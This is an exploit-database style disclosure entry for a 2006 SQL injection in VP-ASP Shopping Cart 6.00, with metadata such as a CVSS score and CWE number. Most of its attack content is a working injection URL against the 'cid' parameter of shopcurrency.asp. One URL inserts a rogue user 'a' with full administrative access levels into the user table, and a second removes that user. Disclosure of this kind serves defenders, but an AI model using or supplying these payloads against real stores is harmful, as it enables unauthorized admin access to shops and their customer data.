vendor:
VP-ASP Shopping Cart
by:
tracewar
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: VP-ASP Shopping Cart
Affected Version From: 6.00
Affected Version To: 6.00
Patch Exists: YES
Related CWE: N/A
CPE: a:vp-asp:vp-asp_shopping_cart:6.00
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
VP-ASP 6.00 SQL Injection / Exploit
The SQL Injection bug is in the shopcurrency.asp file under the 'cid' query. A quick hack to add user a/a is '/shopcurrency.asp?cid=AUD';insert into tbluser ('fldusername','fldpassword','fldaccess') values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--. To remove the user 'a', the command is '/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'--.
Mitigation:
The vendor was already notified.